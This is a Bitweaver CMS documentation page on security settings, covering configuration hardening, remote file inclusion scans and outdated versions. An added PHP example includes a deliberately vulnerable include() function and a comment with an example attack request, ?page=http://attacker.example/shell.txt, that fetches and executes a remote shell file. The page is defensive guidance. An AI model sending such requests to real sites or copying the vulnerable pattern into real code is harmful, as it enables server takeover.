Security
Bitweaver security settings
Created by: laetzer, Last modification: Tue 15 of Jul, 2008 (16:13 UTC)
Bitweaver 2
Security settings
After you have installed bitweaver, check the following settings:
- In /kernel/config_inc.php the parameter IS_LIVE should be "true" (it is "true" by default). With IS_LIVE set to "true", error messages are no longer exposed to visitors. To see the errors yourself, either monitor the error logs directly on the server, or set IS_LIVE to "false" only while testing and developing (with other protection in place, e.g. access to the site restricted), and switch it back to "true" before the site goes live.
- Rename your /install/ directory once the installation is finished. Rename it back only while you install new packages, and rename it again afterwards.
- In Admin > Users > Permissions, make sure that Anonymous is not allowed to attach files to content (this is not allowed by default).
- If users are allowed to input HTML, enable HTMLPurifier, which filters script and other dangerous markup out of user-supplied HTML.
- If Anonymous can submit content, enable CAPTCHA (whether this is available depends on your server's setup).
Security issues
wiki_url_import
The "suck_url Information Disclosure" issue has been fixed in version 2.1. Before that, it was exploitable when the admin had turned on the feature wiki_url_import (off by default).
Hacking attempts
The script kiddie plague du jour is to scan for code that does include($varWithSomeUrlFromGetString); which, if PHP allows URL includes, fetches and executes PHP written by the attacker (remote file inclusion). If such an attack is attempted against a bitweaver install, it might mail an error message to you, the admin, saying something like "unknown column" or "unknown sort order" (normal users browsing your pages never see any error message unless you set IS_LIVE to false in /kernel/config_inc.php). The error mail tells you that the attempted hack failed, i.e., that it didn't do anything.
3rd party applications
PHP security settings
- For security reasons, your server might run PHP with features like open_basedir or safe_mode switched ON. See Install under safe mode. Note that safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4; open_basedir is still available in current PHP versions.
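The following is an added example, not bitweaver code, that makes the two points above concrete: the include() pattern the remote-file-inclusion scans look for, a hardened version that resolves the user-supplied name through a fixed allowlist, and a small report of the php.ini directives that decide whether such an attack can work at all. The page names "home" and "about", their files and the base directory are assumptions for the sake of the example; the directive names are standard PHP settings.

```php
<?php
// Added example (not bitweaver's own code). Shows the include() pattern that
// remote-file-inclusion scans probe for, a hardened replacement, and a check
// of the PHP settings that make the difference between a failed and a
// successful attack.

// VULNERABLE: whatever arrives in ?page= goes straight into include().
// With allow_url_include=On (and allow_url_fopen=On), a request such as
//   ?page=http://attacker.example/shell.txt
// makes PHP download and execute the attacker's file. Even with URL includes
// off, "../../" traversal can still pull in arbitrary local files.
function render_page_vulnerable(string $page): void
{
    include $page;   // never do this
}

// HARDENED: the request only selects an entry from a fixed allowlist, and the
// resolved path must stay below $base. Anything else is rejected.
function resolve_page(string $page, array $allowed, string $base): ?string
{
    if (!array_key_exists($page, $allowed)) {
        return null;                            // unknown page name
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;                            // base directory missing
    }
    $path = realpath($baseReal . DIRECTORY_SEPARATOR . $allowed[$page]);
    // realpath() collapses "..", so a traversal attempt ends up outside $base
    // and fails this prefix check.
    if ($path === false || strpos($path, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(string $page, string $base): void
{
    // Assumed page names and files for this example.
    $allowed = ['home' => 'home.php', 'about' => 'about.php'];
    $path = resolve_page($page, $allowed, $base);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// php.ini directives relevant to the attacks discussed on this page.
// Each entry lists the value the directive should have (false = Off).
function php_settings_report(): array
{
    $wanted = [
        'allow_url_include' => false,  // Off: include('http://...') cannot work
        'allow_url_fopen'   => false,  // Off unless something really needs it
        'display_errors'    => false,  // Off in production; log errors instead
        'register_globals'  => false,  // Off (removed entirely in PHP 5.4)
    ];
    $report = [];
    foreach ($wanted as $directive => $shouldBeOn) {
        $raw = ini_get($directive);
        // ini_get() returns "1"/"0", "On"/"Off" or "" depending on how the
        // value was written; false means the directive does not exist.
        $isOn = $raw !== false && filter_var($raw, FILTER_VALIDATE_BOOLEAN);
        $report[$directive] = ($isOn === $shouldBeOn) ? 'ok' : 'WARN';
    }
    $report['open_basedir'] = (ini_get('open_basedir') !== '') ? 'ok' : 'WARN (unset)';
    return $report;
}

// Usage from the command line: php this_file.php
foreach (php_settings_report() as $directive => $status) {
    printf("%-18s %s\n", $directive, $status);
}
```

The allowlist approach is what matters: validating that the parameter "looks like a local file" is not enough, because the attacker controls the whole string. Run the report on the same PHP installation that serves the site (the CLI may load a different php.ini than the web server's SAPI), and fix any WARN in php.ini rather than in application code.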
Bitweaver 1.3
Bitweaver versions 1.3 and earlier were released in 2004/2005 (see Roadmap). These versions are no longer supported, i.e., their code has not been updated since release. They contain a number of serious security issues. Some stem from 3rd party code, like left-over code from older versions or the infamous Xmlrpc bug (exploitable if the XML-RPC feature is enabled). Many of the improvements introduced with bitweaver 2 addressed these issues specifically. In other words, don't install version 1.3 anymore. If you're running version 1.3 and are concerned about security, please upgrade bitweaver.
Related Items
Documentation » Optimisation
Tips and Tricks on how to optimise your system to get the best performance out of bitweaver and your server
Advanced Apache Configuration for High Traffic Sites • bitweaverPerformance • Security • Speed optimisation